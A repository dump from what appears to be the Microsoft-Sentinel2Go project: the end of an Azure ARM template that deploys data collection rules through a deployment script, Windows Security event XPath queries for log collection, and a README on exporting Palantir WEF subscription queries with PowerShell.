"[concat('userIdentity',uniqueString(resourceGroup().id))]", 44 | "DataSourceFile": "[last(split(parameters('dataSourcesFileUrl'),'/'))]", 45 | "createDCScript": "https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/scripts/Create-DataCollectionRules.ps1", 46 | "scriptArguments": "[concat('-WorkspaceId ', parameters('WorkspaceId'), ' -WorkspaceResourceId ', parameters('WorkspaceResourceId'),' -ResourceGroup ', resourceGroup().name, ' -DataCollectionRuleName ', parameters('DataCollectionRuleName'), ' -DataSourcesFile ', variables('DataSourceFile'), ' -Location ', parameters('location'), ' -verbose')]" 47 | }, 48 | "resources": [ 49 | { 50 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities", 51 | "name": "[variables('identityName')]", 52 | "apiVersion": "2018-11-30", 53 | "location": "[resourceGroup().location]" 54 | }, 55 | { 56 | "type": "Microsoft.Resources/deploymentScripts", 57 | "apiVersion": "2020-10-01", 58 | "name": "sleep", 59 | "location": "[resourceGroup().location]", 60 | "kind": "AzurePowerShell", 61 | "dependsOn": [ 62 | "[concat('Microsoft.ManagedIdentity/userAssignedIdentities/', variables('identityName'))]" 63 | ], 64 | "properties": { 65 | "forceUpdateTag": "1", 66 | "azPowerShellVersion": "3.0", 67 | "arguments": "", 68 | "scriptContent": "Start-Sleep -Seconds 120", 69 | "supportingScriptUris": [], 70 | "timeout": "PT30M", 71 | "cleanupPreference": "Always", 72 | "retentionInterval": "P1D" 73 | } 74 | }, 75 | { 76 | "apiVersion": "2017-09-01", 77 | "type": "Microsoft.Authorization/roleAssignments", 78 | "name": "[parameters('roleGuid')]", 79 | "dependsOn": [ 80 | "[concat('Microsoft.Resources/deploymentScripts/', 'sleep')]" 81 | ], 82 | "properties": { 83 | "roleDefinitionId": "[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Authorization/roleDefinitions/', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]", 84 | "principalId": "[reference(resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', variables('identityName')), '2018-11-30', 'Full').properties.principalId]", 85 | "scope": "[resourceGroup().id]" 86 | } 87 | }, 88 | { 89 | "type": "Microsoft.Resources/deploymentScripts", 90 | "apiVersion": "2020-10-01", 91 | "name": "runPowerShellInlineWithOutput", 92 | "location": "[resourceGroup().location]", 93 | "kind": "AzurePowerShell", 94 | "identity": { 95 | "type": "UserAssigned", 96 | "userAssignedIdentities": { 97 | "[resourceID('Microsoft.ManagedIdentity/userAssignedIdentities/',variables('identityName'))]": {} 98 | } 99 | }, 100 | "dependsOn": [ 101 | "[concat('Microsoft.Authorization/roleAssignments/', parameters('roleGuid'))]" 102 | ], 103 | "properties": { 104 | "forceUpdateTag": "1", 105 | "azPowerShellVersion": "3.0", 106 | "arguments": "[variables('scriptArguments')]", 107 | "primaryScriptUri": "[variables('createDCScript')]", 108 | "supportingScriptUris": [ 109 | "[parameters('dataSourcesFileUrl')]" 110 | ], 111 | "timeout": "PT30M", 112 | "cleanupPreference": "OnSuccess", 113 | "retentionInterval": "P1D" 114 | } 115 | } 116 | ], 117 | "outputs": { 118 | "dataCollectionRuleId": { 119 | "value": "[reference('runPowerShellInlineWithOutput').outputs.text]", 120 | "type": "string" 121 | } 122 | } 123 | } 124 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/active-directory.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/active-directory.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/command.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/command.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/file.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/file.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/logon-session.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/logon-session.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-share.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-share.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-traffic.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-traffic.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/ossem-attack.json: -------------------------------------------------------------------------------- 1 | { 2 | "windowsEventLogs": [ 3 | { 4 | "Name": "eventLogsDataSource", 5 | "scheduledTransferPeriod": "PT1M", 6 | "streams": [ 7 | "Microsoft-WindowsEvent" 8 | ], 9 | "xPathQueries": [ 10 | "Security!*[System[(EventID=5136 or EventID=5139)]]", 11 | "Security!*[System[(EventID=5137)]]", 12 | "Security!*[System[(EventID=5141)]]", 13 | "Security!*[System[(EventID=4662 or EventID=4661)]]", 14 | "Security!*[System[(EventID=4768 or EventID=4769)]]", 15 | "Security!*[System[(EventID=4688)]]", 16 | "Security!*[System[(EventID=4660)]]", 17 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='File']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='File']]))) or (*[System[EventID=4661]] and ((*[EventData[Data[@Name='ObjectType']='SAM']])))", 18 | "Security!*[System[(EventID=4670)]]", 19 | "Security!*[System[(EventID=4624 or EventID=4778 or EventID=4964)]]", 20 | "Security!*[System[(EventID=5140 or EventID=5145)]]", 21 | "Security!*[System[(EventID=5154 or EventID=5159 or EventID=5155 or EventID=5158 or EventID=5156 or EventID=5157 or EventID=5031)]]", 22 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Process']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))", 23 | "Security!*[System[(EventID=4689)]]", 24 | "Security!*[System[(EventID=4698)]]", 25 | "Security!*[System[(EventID=4701 or EventID=4700 or EventID=4702)]]", 26 | "Security!*[System[(EventID=4697)]]", 27 | "Security!*[System[(EventID=4725 or EventID=4722 or EventID=4717 or EventID=4740 or EventID=4738 or EventID=4781 or EventID=4767 or EventID=4718)]]", 28 | "Security!*[System[(EventID=4624 or EventID=4625 or EventID=4648)]]", 29 | "Security!*[System[(EventID=4726)]]", 30 | "Security!*[System[(EventID=4720)]]", 31 | "Security!*[System[(EventID=4670 or EventID=4657)]]", 32 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Key']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))" 33 | ] 34 | } 35 | ] 36 | } 37 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/process.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/process.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/scheduled-job.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/scheduled-job.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/service.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/service.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/user-account.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/user-account.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/windows-registry.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/windows-registry.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/ADFS.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/ADFS.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Lockout.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Lockout.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Management.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Management.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Active-Directory.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Active-Directory.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Application-Crashes.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Application-Crashes.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Applocker.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Applocker.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Authentication.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Authentication.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Autoruns.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Autoruns.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Bits-Client.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Bits-Client.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Certificate-Authority.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Certificate-Authority.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Code-Integrity.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Code-Integrity.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/DNS.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/DNS.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Device-Guard.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Device-Guard.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Drivers.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Drivers.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Duo-Security.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Duo-Security.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/EMET.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/EMET.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Event-Log-Diagnostics.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Event-Log-Diagnostics.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Explicit-Credentials.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Explicit-Credentials.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-ASR.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-ASR.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-CFA.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-CFA.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-EP.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-EP.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-NP.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-NP.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/External-Devices.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/External-Devices.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Firewall.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Firewall.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Group-Policy-Errors.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Group-Policy-Errors.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Kerberos.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Kerberos.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-Security.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-Security.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-System.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-System.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/MSI-Packages.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/MSI-Packages.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Microsoft-Office.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Microsoft-Office.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/NTLM.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/NTLM.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Object-Manipulation.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Object-Manipulation.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Operating-System.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Operating-System.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Powershell.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Powershell.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Print.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Print.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Privilege-Use.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Privilege-Use.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Process-Execution.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Process-Execution.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md: -------------------------------------------------------------------------------- 1 | # Palantir WEF Subscriptions 2 | 3 | ## Reference: 4 | 5 | ### https://github.com/palantir/windows-event-forwarding 6 | 7 | ## Export Queries 8 | 9 | ### Clone Repository 10 | 11 | ```PowerShell 12 | git clone https://github.com/palantir/windows-event-forwarding 13 | cd windows-event-forwarding/wef-subscription 14 | ``` 15 | 16 | ### Export Queries from WEF Subscriptions 17 | 18 | ```PowerShell 19 | $all = Get-ChildItem *.xml 20 | ForEach ( $file in $all){ 21 | $fileName = Split-Path $file -Leaf 22 | [xml]$subscription = get-content $file 23 | [xml]$xmlContent = $subscription.Subscription.Query.'#cdata-section' 24 | $StringWriter = New-Object System.IO.StringWriter 25 | $XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter 26 | $xmlWriter.Formatting = "indented" 27 | $xmlWriter.Indentation = 2 28 | $xmlWriter.IndentChar = ' ' 29 | $xmlContent.WriteContentTo($XmlWriter) 30 | $XmlWriter.Flush() 31 | $StringWriter.Flush() 32 | 33 | $StringWriter.ToString() | out-file "Queries\$fileName" 34 | } 35 | ``` 36 | 37 | ## Test XML Query 38 | 39 | ### Read Account-Lockout.xml Example 40 | 41 | ```PowerShell 42 | 43 | [xml]$Account = get-content .\Account-Lockout.xml 44 | $Account.InnerXml 45 | ``` 46 | 47 | ```xml 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | ``` 58 | 59 | ### Run XML Query 60 | 61 | ```PowerShell 62 | Get-WinEvent -FilterXml $Account 63 | ``` 64 | 65 | ## Export XPath Query for Windows Security Events Connector 66 | 67 | ```PowerShell 68 | $Account.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') } 69 | ``` 70 | 71 | ``` 72 | Security!*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and (Level=4 or Level=0) and EventID=4740]] 73 | ``` 74 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Registry.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Registry.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Services.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Services.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Shares.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Shares.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Smart-Card.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Smart-Card.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Software-Restriction-Policies.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Software-Restriction-Policies.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Sysmon.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Sysmon.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/System-Time-Change.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/System-Time-Change.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Task-Scheduler.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Task-Scheduler.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Terminal-Services.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Terminal-Services.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/WMI.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/WMI.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Defender.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Defender.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Diagnostics.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Diagnostics.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Updates.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Windows-Updates.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Wireless.xml: -------------------------------------------------------------------------------- 